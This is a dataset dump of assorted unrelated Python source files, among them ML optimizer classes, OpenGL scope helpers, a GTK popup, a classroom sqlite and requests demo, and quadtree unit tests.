text stringlengths 38 1.54M |
|---|
import KNN
import gzip
import pickle
import TestBase
def main():
    """Run KNN rating predictions over sampled reviews and report accuracy.

    Assumes TestBase.get_query_list returns queries grouped by star rating
    (index 0 -> 1 star ... index 4 -> 5 stars) -- TODO confirm against TestBase.
    """
    #path = r'C:\Users\mdhal\Desktop\Fall 2018\Machine Learning\Project\Compressed\reviews_Musical_Instruments_5.json.gz'
    path = r'C:\Users\mdhal\Desktop\Fall 2018\Machine Learning\Project\Compressed\reviews_Books_5.json.gz'
    num_tests = 2000
    queries = TestBase.get_query_list(path, num_tests)
    # num_off[d] counts guesses that were exactly d stars away from the truth.
    num_off = [0] * 5
    max_to_grab = TestBase.find_count(queries)
    for rating_idx in range(5):
        for query_idx in range(max_to_grab):
            knn_val = KNN.guess_review(queries[rating_idx][query_idx])
            #print(knn_val)
            distance = abs(rating_idx + 1 - knn_val)  # actual - estimate
            num_off[distance] += 1
            print("i:{} j:{}".format(rating_idx, query_idx))
    # Total stars of error, weighted by how far off each guess was.
    off = sum(d * num_off[d] for d in range(1, 5))
    percent_correct = num_off[0] / len(queries[0]) * 20
    print('NUM CORRECT = ', num_off[0])
    print('PERCENT CORRECT = ', percent_correct)
    print('AVG OFFSET = ', float(off / len(queries[0]) / 5))
    print('NUM 1 OFF = ', num_off[1])
    print('NUM 2 OFF = ', num_off[2])
    print('NUM 3 OFF = ', num_off[3])
    print('NUM 4 OFF = ', num_off[4])
main()
|
import random
from army_factory import ArmyFactory
from constants import STRATEGIES
class Battlefield:
    """Simulates one round of war between randomly generated armies."""

    def __init__(self, num_armies):
        """Create *num_armies* armies, each with a randomly chosen strategy."""
        self._armies = [ArmyFactory.create(random.choice(STRATEGIES))
                        for _ in range(num_armies)]

    def start(self):
        """Announce the armies, run one attack round, then announce survivors."""
        print("There are {} armies. The strategies are:".format(len(self._armies)))
        for i, army in enumerate(self._armies):
            print("{} - {}".format(i, army.get_strategy()))
        for i, army in enumerate(self._armies):
            if not army.is_alive():
                continue
            enemies = [x for x in self._armies if x != army and x.is_alive()]
            # BUG FIX: random.choice([]) raises IndexError when no living
            # enemy remains (e.g. a single army, or everyone else is dead).
            if not enemies:
                break
            target_army = random.choice(enemies)
            # BUG FIX: "It's" (contraction of "it is") corrected to "Its".
            print("\tNEW BATTLE army № {} ATTACKS army № {}. Its strategy is {}".format(
                i, self._armies.index(target_army), army.get_strategy()))
            army.attack(target_army)
        for i, army in enumerate(self._armies):
            if army.is_alive():
                # BUG FIX: "WINS THE WAS" corrected to "WINS THE WAR".
                print("ARMY № {} WINS THE WAR. {} IS THE BEST".format(i, army.get_strategy()))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
''' Optimizer classes for parameters optimization.
'''
import numpy as np
from simpleflow.base import compute_gradients, DEFAULT_GRAPH
from functools import partial
class Optimizer(object):
    """Base class for gradient-based parameter optimizers."""

    def __init__(self):
        self.output_value = None   # placeholder so the optimizer fits the op interface
        self.loss = None           # loss node registered via minimize()
        self.grad_table = None     # var -> gradient mapping built in compute_output()

    def minimize(self, loss):
        """Register *loss* as the objective; return [loss, optimizer] for the graph."""
        self.loss = loss
        return [loss, self]

    def compute_output(self):
        """Compute gradients of the loss, then apply call() to every trainable variable."""
        self.grad_table = compute_gradients(self.loss)
        for var in DEFAULT_GRAPH.trainable_variables:
            self.call(var)

    def call(self, var):
        """Apply one update step to *var*; subclasses must override."""
        raise NotImplementedError
class GradientDescentOptimizer(Optimizer):
    ''' Optimizer implementing plain (batch) gradient descent.
    '''
    def __init__(self, learning_rate):
        ''' Construct a new gradient descent optimizer.
        :param learning_rate: learning rate of the optimizer.
        :type learning_rate: float
        '''
        # BUG FIX: super(self.__class__, ...) recurses forever as soon as this
        # class is subclassed; always name the class explicitly.
        super(GradientDescentOptimizer, self).__init__()
        self.learning_rate = learning_rate

    def call(self, var):
        ''' Apply one gradient-descent step to *var* in place.
        '''
        if var in self.grad_table:
            # var <- var - lr * grad; drop the entry so each variable is
            # updated at most once per compute_output() pass.
            var.output_value -= self.learning_rate * self.grad_table[var]
            del self.grad_table[var]
class StochasticGradientDescentOptimizer(Optimizer):
    ''' Stub optimizer for stochastic gradient descent; update rule not yet implemented.
    '''
    def __init__(self, learning_rate):
        ''' Construct a new stochastic gradient descent optimizer.
        :param learning_rate: learning rate of the optimizer.
        :type learning_rate: float
        '''
        # BUG FIX: super(self.__class__, ...) recurses forever under
        # subclassing; name the class explicitly.
        super(StochasticGradientDescentOptimizer, self).__init__()
        self.learning_rate = learning_rate

    def call(self, var):
        ''' Apply one SGD step to *var*.
        :raises NotImplementedError: always -- TODO implement the SGD update.
        '''
        raise NotImplementedError
class MomentumOptimizer(Optimizer):
    ''' Optimizer implementing gradient descent with momentum.
    '''
    def __init__(self, learning_rate, momentum=0., decay=0.):
        ''' Construct a new momentum optimizer.
        :param learning_rate: learning rate of the optimizer.
        :type learning_rate: float
        :param momentum: velocity retention factor (0 disables momentum).
        :param decay: initial velocity value.
        '''
        # BUG FIX: super(self.__class__, ...) recurses forever under
        # subclassing; name the class explicitly.
        super(MomentumOptimizer, self).__init__()
        self.learning_rate = learning_rate
        self.momentum = momentum
        self.decay = decay

    def call(self, var):
        ''' Apply one momentum step to *var* in place.
        '''
        if var in self.grad_table:
            # velocity <- momentum * velocity - lr * grad; var <- var + velocity.
            # NOTE(review): self.decay is a single velocity shared by ALL
            # trainable variables; the standard formulation keeps one velocity
            # per variable -- confirm before using with multiple variables.
            self.decay = self.momentum * self.decay - self.learning_rate * self.grad_table[var]
            var.output_value += self.decay
            del self.grad_table[var]
class AdaGradOptimizer(Optimizer):
    ''' Optimizer implementing the AdaGrad algorithm.
    '''
    def __init__(self, learning_rate, decay=0.):
        ''' Construct a new AdaGrad optimizer.
        :param learning_rate: learning rate of the optimizer.
        :type learning_rate: float
        :param decay: initial value of the squared-gradient accumulator.
        '''
        # BUG FIX: super(self.__class__, ...) recurses forever under
        # subclassing; name the class explicitly.
        super(AdaGradOptimizer, self).__init__()
        self.learning_rate = learning_rate
        self.decay = decay

    def call(self, var):
        ''' Apply one AdaGrad step to *var* in place.
        '''
        if var in self.grad_table:
            grad = self.grad_table[var]
            # Accumulate squared gradients.
            self.decay += np.power(grad, 2)
            # BUG FIX: AdaGrad divides by sqrt(accumulator) + eps; the original
            # divided by np.power(decay, -2) == 1/decay**2, which *multiplied*
            # the step by decay**2.
            # NOTE(review): the accumulator is shared across all trainable
            # variables; standard AdaGrad keeps one per variable.
            var.output_value -= self.learning_rate * grad / (np.sqrt(self.decay) + 1e-8)
            del self.grad_table[var]
class RMSPropOptimizer(Optimizer):
    ''' Optimizer implementing the RMSProp algorithm.
    '''
    def __init__(self, learning_rate, beta=0.999, decay=0.):
        ''' Construct a new RMSProp optimizer.
        :param learning_rate: learning rate of the optimizer.
        :type learning_rate: float
        :param beta: exponential decay rate for the squared-gradient average.
        :param decay: initial value of the running average.
        '''
        # BUG FIX: super(self.__class__, ...) recurses forever under
        # subclassing; name the class explicitly.
        super(RMSPropOptimizer, self).__init__()
        self.learning_rate = learning_rate
        self.decay = decay
        self.beta = beta

    def call(self, var):
        ''' Apply one RMSProp step to *var* in place.
        '''
        if var in self.grad_table:
            grad = self.grad_table[var]
            # Exponential moving average of squared gradients.
            self.decay = self.beta * self.decay + (1 - self.beta) * np.power(grad, 2)
            # BUG FIX: RMSProp divides by sqrt(running average) + eps; the
            # original divided by np.power(decay, -2) == 1/decay**2.
            # NOTE(review): the running average is shared across variables;
            # standard RMSProp keeps one per variable.
            var.output_value -= self.learning_rate * grad / (np.sqrt(self.decay) + 1e-8)
            del self.grad_table[var]
class AdamOptimizer(Optimizer):
    ''' Optimizer implementing the Adam algorithm.
    '''
    def __init__(self, learning_rate, beta1=0.9, beta2=0.999, momentum=0., decay=0.):
        ''' Construct a new Adam optimizer.
        :param learning_rate: learning rate of the optimizer.
        :type learning_rate: float
        :param beta1: decay rate for the first-moment (mean) estimate.
        :param beta2: decay rate for the second-moment (variance) estimate.
        :param momentum: initial first-moment estimate.
        :param decay: initial second-moment estimate.
        '''
        # BUG FIX: super(self.__class__, ...) recurses forever under
        # subclassing; name the class explicitly.
        super(AdamOptimizer, self).__init__()
        self.learning_rate = learning_rate
        self.decay = decay
        self.momentum = momentum
        self.beta1 = beta1
        self.beta2 = beta2

    def call(self, var):
        ''' Apply one Adam step to *var* in place.
        '''
        if var in self.grad_table:
            grad = self.grad_table[var]
            # First (mean) and second (uncentered variance) moment estimates.
            self.momentum = self.beta1 * self.momentum + (1 - self.beta1) * grad
            self.decay = self.beta2 * self.decay + (1 - self.beta2) * np.power(grad, 2)
            # BUG FIX: Adam divides by sqrt(second moment) + eps; the original
            # divided by np.power(decay, -2) == 1/decay**2.
            # NOTE(review): no bias correction (m_hat/v_hat) is applied and the
            # moment estimates are shared across variables -- kept as in the
            # original; confirm before multi-variable use.
            var.output_value -= self.learning_rate * self.momentum / (np.sqrt(self.decay) + 1e-8)
            del self.grad_table[var]
|
# Count and report the lines of a user-named file that begin with 's'.
fname = input('Enter the file name: ')
try:
    fhand = open(fname)
except OSError:
    # BUG FIX: was a bare `except:`, which also swallowed KeyboardInterrupt
    # and typos; only file-open failures are expected here.
    print('File can not be opened:', fname)
    quit()
count = 0
with fhand:  # ensure the file is closed once counting is done
    for line in fhand:
        if line.startswith('s'):
            count = count + 1
print('There were ', count, 'lines that start with s in', fname)
|
from __future__ import division
#/usr/bin/env python
# -*- coding: utf-8 -*-
#
# exclude duplicates in same line and sort to ensure one word is always before other
#
# look: https://stackoverflow.com/questions/21297740/how-to-find-set-of-most-frequently-occurring-word-pairs-in-a-file-using-python
#
# Copyright 2018 Vasiliki Kordopati <vasiliki.kordopati@Vasilikis-MacBook-Pro.local>
#
# example of input:
# DOID_4236 DOID_4236 DOID_4195 DOID_4195 DOID_4195 DOID_4195 DOID_4236 CHEBI_16199
# DOID_0060260 DOID_0060145 UBERON_0001711 GO_0008152 UBERON_0000955
# DOID_4071 DOID_4029 DOID_4071 DOID_4029 DOID_1724 DOID_4071 DOID_4029 DOID_4029 DOID_4071 DOID_4029 UBERON_0001165 UBERON_0001166
# DOID_11755 UBERON_0002394 UBERON_0001174 ENVO_01000472 UBERON_0004529 UBERON_0002114 UBERON_0007651
# DOID_9408 CHEBI_23888
#
# example of output:
# ['CHEBI_16199', 'DOID_4195', 'DOID_4236']
# ['DOID_0060145', 'DOID_0060260', 'GO_0008152', 'UBERON_0000955', 'UBERON_0001711']
# ['DOID_1724', 'DOID_4029', 'DOID_4071', 'UBERON_0001165', 'UBERON_0001166']
# ['DOID_11755', 'ENVO_01000472', 'UBERON_0001174', 'UBERON_0002114', 'UBERON_0002394', 'UBERON_0004529', 'UBERON_0007651']
# ['CHEBI_23888', 'DOID_9408']
#
#import file input
import re
import sys
import os
import os, os.path
import math
import subprocess
import multiprocessing
from math import log
from itertools import combinations
from collections import Counter
corpus = []
# Load the corpus: one list of tokens per line of the input file
# (the `with` block closes the file; no explicit close() needed).
with open(sys.argv[1], 'r') as infile2:
    for line in infile2:
        # Split on any non-word character; raw string avoids the invalid
        # "\w" escape warning on newer Pythons.
        corpus.append(re.sub(r"[^\w]", " ", line.rstrip('\n')).split())
print('i finished: load the corpus')
# For each line keep only unique tokens, sorted so that within any pair one
# word always precedes the other; print and append each list to the output.
# The output file is opened once (the original reopened it per line).
with open(sys.argv[2], 'a') as f1:
    for line in corpus:
        unique_tokens = sorted(set(line))
        print(unique_tokens)
        f1.write(str(unique_tokens) + '\n')
|
import csv
import matplotlib.pyplot as plt
import numpy as np
import time
import os
import sqlite3
import requests
class alvian:
    """Classroom demo exercising csv, matplotlib, iterators, sqlite3 and requests."""

    # Run every demo method in sequence.
    def MataBatin(self):
        self.nomor()
        self.nama()
        self.uang()
        self.Matplotlib()
        self.cobaWhile()
        self.CobaTabel()
        self.InputData()
        self.ViewData()
        self.requestaja()
        self.requestaja2()

    # if / if-else / if-elif-else demos over a CSV of (amount, name) rows.
    def nomor(self):
        with open('kelas_2c/alvian.csv') as file:
            datanya = csv.reader(file, delimiter=',')
            for r in datanya:
                if int(r[0]) < 30000:
                    print("Bayar", (r[1]))

    def nama(self):
        with open('kelas_2c/alvian.csv') as file:
            datanya = csv.reader(file, delimiter=',')
            for r in datanya:
                if int(r[0]) == 20000:
                    print((r[1]), "nama paling keren")
                else:
                    print((r[1]), "bukan alvian Oy")

    def uang(self):
        with open('kelas_2c/alvian.csv') as file:
            datanya = csv.reader(file, delimiter=',')
            for r in datanya:
                if int(r[0]) == 20000:
                    print("punya uang Rp.", (r[0]), "aku lumayan kaya loh", "atas nama", (r[1]))
                elif int(r[0]) == 30000:
                    print("punya uang Rp.", (r[0]), "Disini Kaya boy", "atas nama", (r[1]))
                elif int(r[0]) == 21000:
                    print("punya uang Rp.", (r[0]), "masih miskin loh :)", "atas nama", (r[1]))
                else:
                    print("punya uang Rp.", (r[0]), "kurang kaya aku", "atas nama", (r[1]))

    # Matplotlib demo: sine and cosine stacked in one saved + shown figure.
    def Matplotlib(self):
        x = np.arange(0, 3 * np.pi, 0.1)
        y_sin = np.sin(x)
        y_cos = np.cos(x)
        plt.subplot(2, 1, 1)
        # First subplot.
        plt.plot(x, y_sin)
        plt.title('Sine')
        plt.subplot(2, 1, 2)
        plt.plot(x, y_cos)
        plt.title('Cosine')
        plt.savefig("kelas_2c/vian_Matplotlib.png")
        # Display the figure window.
        plt.show()

    # Iterator demo: drain a file with next(), then show a second for-loop
    # over the same (now exhausted) handle yields nothing, timing both.
    def cobaWhile(self):
        list1 = open('kelas_2c/alvian.txt', 'r')
        list2 = list1  # deliberately the same file object
        list1 = iter(list1)
        print("The contents of list are : ")
        start_next = time.time()
        while (1):
            val = next(list1, 'end')  # 'end' sentinel instead of StopIteration
            if val == 'end':
                break
            else:
                print(val)
        print("Time taken for next() is : " + str(time.time() - start_next))
        start_for = time.time()
        for i in list2:
            print(i)
        print("Time taken for loop is : " + str(time.time() - start_for))
        # BUG FIX: the file handle was never closed; close it once both
        # passes over the shared object are done.
        list2.close()

    # Database demos: create table, insert rows, view first row.
    def CobaTabel(self):
        try:
            self.connection = sqlite3.connect('./kelas_2c/alvianpunya.db')
            self.cursor = self.connection.cursor()
            self.cursor.execute('CREATE TABLE vian (id INTEGER PRIMARY KEY, nama VARCHAR(50), rupiah VARCHAR(50))')
        except Exception:
            # BUG FIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit. Expected failure here is the
            # table already existing on re-runs.
            print("Failed Tabel Again Coyy!")

    def InputData(self):
        try:
            self.cursor.execute('INSERT INTO vian VALUES(?, ?, ?)', (1, "alvian", "Dua Puluh Ribu"))
            self.cursor.execute('INSERT INTO vian VALUES(?, ?, ?)', (2, "sinaga", "Tiga Puluh Ribu"))
            self.cursor.execute('INSERT INTO vian VALUES(?, ?, ?)', (3, "daniel", "Tiga Puluh lima Ribu"))
            self.connection.commit()
        except Exception:
            # BUG FIX: was a bare `except:`; expected failure is duplicate
            # primary keys on re-runs.
            print("Failed Table Again Coyy!")

    def ViewData(self):
        self.cursor.execute('SELECT * FROM vian')
        row = self.cursor.fetchone()
        nama = row[1]
        rupiah = row[2]
        print("nama : " + str(nama))
        print("rupiah : " + str(rupiah))
        self.connection.commit()

    # HTTP request demos: fetch a page body, then check a status code.
    def requestaja(self):
        i = requests.get('https://www.youtube.com/watch?v=rJHCtij6vaA&list=RDrJHCtij6vaA&start_radio=1')
        print(i.text)

    def requestaja2(self):
        i = requests.get('https://github.com/cemewew asd123 3213')
        print(i.status_code)
        if i:  # Response truthiness: status code < 400
            print('Belajar Yang pinter aja dulu')
        else:
            print('banyak banyak Doa :)')
from django.apps import AppConfig
class InformationSourcesConfig(AppConfig):
    """Django application configuration for the ``information_sources`` app."""
    name = 'information_sources'
|
import gtk
from gobject import timeout_add, source_remove
class EscapeObject(object): pass
class FeedbackPopup(object):
    """Borderless, focus-less popup that flashes a short feedback message over
    the bottom-right corner of an editor's text view, auto-hiding after a
    timeout (PyGTK 2 API)."""

    def __init__(self):
        self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
        self.window.set_property('allow-shrink', True)
        # Keep the popup out of the pager/taskbar and never let it take focus.
        self.window.props.skip_pager_hint = True
        self.window.props.skip_taskbar_hint = True
        self.window.props.accept_focus = False
        self.window.set_decorated(False)
        self.bar = gtk.EventBox()
        self.bar.set_border_width(5)
        box = gtk.EventBox()
        self.label = gtk.Label()
        self.label.set_alignment(0, 0)
        self.label.set_padding(10, 0)
        box.add(self.label)
        self.bar.add(box)
        self.bar.show_all()
        self.window.add(self.bar)
        self.window.realize()
        # Override-redirect: bypass the window manager entirely.
        self.window.window.set_override_redirect(True)
        self.timeout_id = None           # gobject source id for the auto-hide timer
        self.escape = None               # EscapeObject sentinel while visible
        self.handlers_connected = False  # editor focus handlers wired up at most once

    def focus_out_event(self, wnd, event):
        # Hide the popup whenever the editor window loses focus.
        self.window.hide()

    def focus_in_event(self, wnd, event):
        # On focus return, re-show only if the auto-hide timer is still pending.
        if self.timeout_id:
            self.window.show()

    def remove_timeout(self):
        # Cancel a pending auto-hide timer, if any.
        if self.timeout_id:
            source_remove(self.timeout_id)
            self.timeout_id = None

    def show(self, editor, text, timeout=1500, markup=False):
        """Show *text* over *editor* for *timeout* milliseconds.

        :param editor: object exposing .window (toplevel) and .view (text view).
        :param markup: if True, treat *text* as Pango markup.
        """
        if not self.handlers_connected:
            self.handlers_connected = True
            toplevel = editor.window
            toplevel.connect('focus-out-event', self.focus_out_event)
            toplevel.connect('focus-in-event', self.focus_in_event)
        self.remove_timeout()
        if self.escape:
            self.hide()
        if markup:
            self.label.set_markup(text)
        else:
            self.label.set_text(text)
        self.window.resize(*self.window.size_request())
        # Anchor the popup to the bottom-right corner of the text window.
        win = editor.view.get_window(gtk.TEXT_WINDOW_TEXT)
        x, y, w, h, _ = win.get_geometry()
        x, y = win.get_origin()
        mw, mh = self.window.get_size()
        self.window.set_transient_for(editor.window)
        self.window.move(x + w - mw, y + h - mh)
        self.window.show()
        if not self.escape:
            self.escape = EscapeObject()
        self.timeout_id = timeout_add(timeout, self.hide)

    def hide(self, *args):
        # Also used as the timeout callback; returning False stops the timer.
        self.remove_timeout()
        self.window.hide()
        self.escape = None
        return False
|
class ProcessControlBlock:
    """Bookkeeping record for one process in a toy scheduler."""

    def __init__(self, pid, resources, status, ready_list, pcb_parent, priority):
        self.pid = pid
        # BUG FIX: the original line ended with a stray comma
        # ("resources,"), silently wrapping the argument in a 1-tuple.
        self.resources = resources
        self.status = status
        self.ready_list = ready_list
        self.pcb_parent = pcb_parent
        self.pcb_children = []  # populated as child processes are created
        self.priority = priority
|
# -*- coding: utf-8 -*-
"""
This module provides the miscellaneous utility functions required by kousen.gl.
"""
from OpenGL import GL
from OpenGL import GLU
from PySide import QtCore
from PySide import QtGui
class Scope(object):
    """
    Scope provides a context manager base interface for various OpenGL operations.
    """
    def __init__(self):
        super(Scope, self).__init__()

    def __enter__(self):
        pass

    def __exit__(self, type, value, traceback):
        # BUG FIX: the original returned `type`, which is truthy whenever an
        # exception occurred inside the scope and therefore silently
        # suppressed it. Return `not type` (the form every subclass scope in
        # this module uses) so exceptions propagate normally.
        return not type

    def push(self):
        """Explicit (non-``with``) entry into the scope."""
        self.__enter__()

    def pop(self):
        """Explicit (non-``with``) exit from the scope."""
        self.__exit__(None, None, None)
class CompoundScope(Scope):
    """
    CompoundScope provides a context manager for a sequence of Scope objects.
    """
    def __init__(self, *args):
        # BUG FIX: the original called super(Scope, self).__init__(), skipping
        # Scope's own __init__ in the MRO; name this class explicitly.
        super(CompoundScope, self).__init__()
        self.__args = args

    def __enter__(self):
        # Enter child scopes in the order given.
        for item in self.__args:
            item.__enter__()

    def __exit__(self, type, value, traceback):
        # BUG FIX: the original iterated `self.args`, which does not exist
        # (the attribute is name-mangled as `self.__args`) and raised
        # AttributeError on every exit. Exit children in reverse entry order.
        for item in reversed(self.__args):
            item.__exit__(type, value, traceback)
        # Falsy when an exception occurred so it propagates (the original
        # returned `type`, which suppressed in-scope exceptions).
        return not type
class GLUQuadricScope(Scope):
    """
    GLUQuadricScope provides a context manager for GLU.Quadric operations.
    """
    def __init__(self):
        super(GLUQuadricScope, self).__init__()
        self._quadric = None  # lazily created on first entry

    def __enter__(self):
        if not self._quadric:
            self._quadric = GLU.gluNewQuadric()

    def __exit__(self, type, value, traceback):
        if self._quadric:
            # BUG FIX: the original referenced bare `_quadric` (NameError);
            # the attribute is `self._quadric`.
            GLU.gluDeleteQuadric(self._quadric)
            self._quadric = None
        return not type
class GLAttribScope(Scope):
    """
    GLAttribScope provides a context manager for an OpenGL Attribute operations (i.e. GL.glPushAttrib / GL.glPopAttrib)
    """
    def __init__(self, mask):
        super(GLAttribScope, self).__init__()
        # Attribute-group mask forwarded to GL.glPushAttrib (e.g. GL.GL_ENABLE_BIT).
        self._mask = mask
    def __enter__(self):
        GL.glPushAttrib(self._mask)
    def __exit__(self ,type, value, traceback):
        GL.glPopAttrib()
        # Falsy when an exception occurred, so it propagates to the caller.
        return not type
class GLClientAttribScope(Scope):
    """
    GLClientAttribScope provides a context manager for an OpenGL Client Attribute operations (i.e. GL.glPushClientAttrib / GL.glPopClientAttrib)
    """
    def __init__(self, mask):
        super(GLClientAttribScope, self).__init__()
        # Client-attribute mask forwarded to GL.glPushClientAttrib.
        self._mask = mask
    def __enter__(self):
        GL.glPushClientAttrib(self._mask)
    def __exit__(self, type, value, traceback):
        GL.glPopClientAttrib()
        # Falsy when an exception occurred, so it propagates to the caller.
        return not type
class GLMatrixScope(Scope):
    """
    GLMatrixScope provides a context manager for OpenGL Matrix Stack operations (i.e. GL.glPushMatrix / GL.glPopMatrix)
    """
    def __init__(self, matrixmode=None, identity=False):
        # matrixmode: optional matrix mode (e.g. GL.GL_PROJECTION) to switch to
        # for the scope's duration; None keeps the current mode.
        # identity: load the identity matrix right after pushing.
        super(GLMatrixScope, self).__init__()
        self._nextmode = matrixmode
        self._identity = identity
    def __enter__(self):
        if self._nextmode:
            # Remember the active mode so it can be restored on exit
            # (_prevmode is only set -- and only needed -- when switching).
            self._prevmode = GL.glGetIntegerv(GL.GL_MATRIX_MODE)
            GL.glMatrixMode(self._nextmode)
        GL.glPushMatrix();
        if self._identity:
            GL.glLoadIdentity()
    def __exit__(self ,type, value, traceback):
        GL.glPopMatrix()
        if self._nextmode:
            GL.glMatrixMode(self._prevmode)
        # Falsy when an exception occurred, so it propagates to the caller.
        return not type
class GLVariableScope(Scope):
    """
    GLVariableScope provides a context manager for an OpenGL variable operations
    with GLVariableScope(GL.glLineWidth, GL.GL_LINE_WIDTH, 3.0):
    ...
    """
    def __init__(self, glmethod, glid, value):
        # glmethod: setter call (e.g. GL.glLineWidth); glid: the matching
        # query enum (e.g. GL.GL_LINE_WIDTH); value: value applied inside
        # the scope.
        super(GLVariableScope, self).__init__()
        self._prevvalue = None
        self._nextvalue = value
        self._set = glmethod
        self._id = glid
    def __enter__(self):
        # Capture the current value, then apply the requested one.
        # NOTE(review): glGetInteger truncates float-valued state (e.g. a
        # line width of 1.5) -- confirm glGetFloatv is not needed for the
        # ids used with this scope.
        self._prevvalue = GL.glGetInteger(self._id)
        self._set(self._nextvalue)
    def __exit__(self ,type, value, traceback):
        # Restore the value captured on entry.
        self._set(self._prevvalue)
        return not type
class GLColorScope(Scope):
    """
    GLColorScope provides a context manager for an OpenGL glColor operations independent of the GL.GL_CURRENT_COLOR attribute.
    with GLColorScope(color):
    ...
    """
    def __init__(self, qcolor):
        super(GLColorScope, self).__init__()
        self._glcolor = None  # previous GL color captured on entry
        self._qcolor = None   # normalized QColor to apply, if recognised
        # Accept either a QColor instance or a Qt.GlobalColor enum value;
        # anything else leaves _qcolor None and the scope is a no-op.
        if isinstance(qcolor, QtGui.QColor):
            self._qcolor = qcolor
        elif isinstance(qcolor, QtCore.Qt.GlobalColor):
            self._qcolor = QtGui.QColor(qcolor)
    def __enter__(self):
        if not self._glcolor and self._qcolor:
            # Save the current color, then apply the requested one as RGBA floats.
            self._glcolor = GL.glGetFloatv(GL.GL_CURRENT_COLOR)
            GL.glColor(self._qcolor.getRgbF())
    def __exit__(self ,type, value, traceback):
        if self._glcolor:
            # Restore the color saved on entry.
            GL.glColor(self._glcolor)
            self._glcolor = None
        return not type
class GLScope(Scope):
    """
    GLScope provides a context manager for an OpenGL operations (GL.glBegin / GL.glEnd)
    with GLScope(GL.GL_LINES):
    ...
    """
    def __init__(self, mode):
        # mode: primitive mode forwarded to GL.glBegin (e.g. GL.GL_TRIANGLES).
        super(GLScope, self).__init__()
        self._mode = mode
    def __enter__(self):
        GL.glBegin(self._mode)
    def __exit__(self ,type, value, traceback):
        GL.glEnd()
        # Falsy when an exception occurred, so it propagates to the caller.
        return not type
|
import unittest, SpatialBasedQuadTree
from SpatialBasedQuadTree import SpatialQuadTree2D
from QuadTestItem import TestItem
from random import randint
runPerformanceTests = False
class Tester(unittest.TestCase):
    """Unit tests for SpatialQuadTree2D."""

    def test_GetItemXY(self):
        q = getBaseSpatialTree()
        intendedX = 10
        intendedY = 10
        t = TestItem(intendedX, intendedY)
        actualX, actualY = q.getItemXY(t)
        self.assertTrue(intendedX == actualX and intendedY == actualY)

    def test_HasNone(self):
        q = getBaseSpatialTree()
        self.assertTrue(q.hasNone(14, 'ee', getBaseSpatialTree(), None))

    def test_XYToItemWhenNone(self):
        q = getBaseSpatialTree()
        t = TestItem(10, 10)
        x, y = q.xyToItemWhenNone(t, 10, None)
        self.assertTrue(x == 10 and y == 10)

    def testAdd(self, amountToAdd=None):
        """Add random in-bounds items; returns (tree, itemsAdded) for reuse."""
        if amountToAdd is None:
            amountToAdd = 1000
        q = getQuadTreeWithItems()
        itemsAdded = []
        for i in range(amountToAdd):
            t = TestItem(randint(0, q.width), randint(0, q.length))
            itemsAdded.append(t)
            self.assertTrue(q.add(t))
        # Out-of-bounds items must be rejected.
        self.assertFalse(q.add(TestItem(10000, 10000)))
        return q, itemsAdded

    def testBigAdd(self):
        """Performance smoke test; skipped unless runPerformanceTests is set."""
        global runPerformanceTests
        if not runPerformanceTests:
            return
        n = 1000 * 100
        x, y = 0, 0
        # Renamed from `len` to avoid shadowing the builtin.
        length, width = n, n
        capacity = 30
        s = {}
        q = getBaseSpatialTree(x=x, y=y, l=length, w=width, c=capacity, s=s)
        for i in range(n):
            print("Now doing " + str(i))
            self.assertTrue(q.add(TestItem(randint(0, n), randint(0, n))))
        self.assertFalse(q.add(TestItem(n * 2, n * 2)))

    def testIsWithinQuadRange(self):
        q = getBaseSpatialTree()
        # Explicit-bounds form: 500,500, q.originX, q.originY, q.width, q.length
        self.assertTrue(q.isWithinQuadRange(500, 500, q.originX, q.originY, q.width, q.length))
        self.assertTrue(q.isWithinQuadRange(0, 0, q.originX, q.originY, q.width, q.length))
        self.assertTrue(q.isWithinQuadRange(1000, 1000, q.originX, q.originY, q.width, q.length))
        # Default-bounds form.
        self.assertTrue(q.isWithinQuadRange(500, 500))
        self.assertTrue(q.isWithinQuadRange(0, 0))
        self.assertTrue(q.isWithinQuadRange(1000, 1000))

    def testFindItemsThatBelongInQuad(self):
        q, itemsAdded = self.testAdd(1000)
        itemsBelongingInQuad = []
        itemsNotBelongingInQuad = []
        itemsToBeChecked = {}
        for i in itemsAdded:
            # BUG FIX: was `randint(0, 1) is 1` -- identity comparison with an
            # int literal relies on CPython small-int interning and raises a
            # SyntaxWarning on 3.8+; use == for value comparison.
            if randint(0, 1) == 1:
                itemsBelongingInQuad.append(i)
            else:
                itemsNotBelongingInQuad.append(TestItem(10000, randint(10000, 100000)))
        for i in itemsBelongingInQuad + itemsNotBelongingInQuad:
            itemsToBeChecked[i] = q
        itemsToBelongInQuad = q.findItemsThatBelongInQuad(itemsToBeChecked, q.originX, q.originY, q.width, q.length)
        for i in itemsBelongingInQuad:
            self.assertTrue(i in itemsToBelongInQuad)
        for i in itemsNotBelongingInQuad:
            self.assertTrue(i not in itemsToBelongInQuad)

    def testChooseQuadByXY(self):
        q0, q1, q2, q3 = getChildrenOfBaseSpatialTree()
        q = getBaseSpatialTree()
        q.quadrant0 = q0
        q.quadrant1 = q1
        q.quadrant2 = q2
        q.quadrant3 = q3
        # Quadrant 0 (parent-origin corner).
        self.assertTrue(q.chooseQuadByXY(150, 150) is q0)
        self.assertTrue(q.chooseQuadByXY(0, 0) is q0)
        self.assertTrue(q.chooseQuadByXY(250, 250) is q0)
        # Quadrant 1.
        self.assertTrue(q.chooseQuadByXY(600, 400) is q1)
        self.assertTrue(q.chooseQuadByXY(1000, 400) is q1)
        # Quadrant 2.
        self.assertTrue(q.chooseQuadByXY(750, 799) is q2)
        self.assertTrue(q.chooseQuadByXY(1000, 1000) is q2)
        # Quadrant 3.
        self.assertTrue(q.chooseQuadByXY(450, 600) is q3)
        self.assertTrue(q.chooseQuadByXY(400, 600) is q3)

    def testIsWithinCapacity(self):
        q = getQuadTreeWithItems()
        self.assertTrue(q.isWithinCapacity([TestItem(10, 10)], q.quadrantCapacity))

    def testExpandCapacity(self):
        q = getBaseSpatialTree()
        q.expandCapacity()
        # All four child quadrants must exist after expansion.
        self.assertTrue(q.quadrant0 is not None)
        self.assertTrue(q.quadrant1 is not None)
        self.assertTrue(q.quadrant2 is not None)
        self.assertTrue(q.quadrant3 is not None)

    def testRemoveItem(self, amountToRemove=None):
        if amountToRemove is None:
            amountToRemove = 100
        q, itemsAdded = self.testAdd(amountToRemove * 10)
        itemsRemoved = []
        for i in itemsAdded:
            if randint(0, 1):
                itemsRemoved.append(i)
                didRemove, itemRemoved = q.removeItem(i, i.x, i.y)
                self.assertTrue(didRemove)
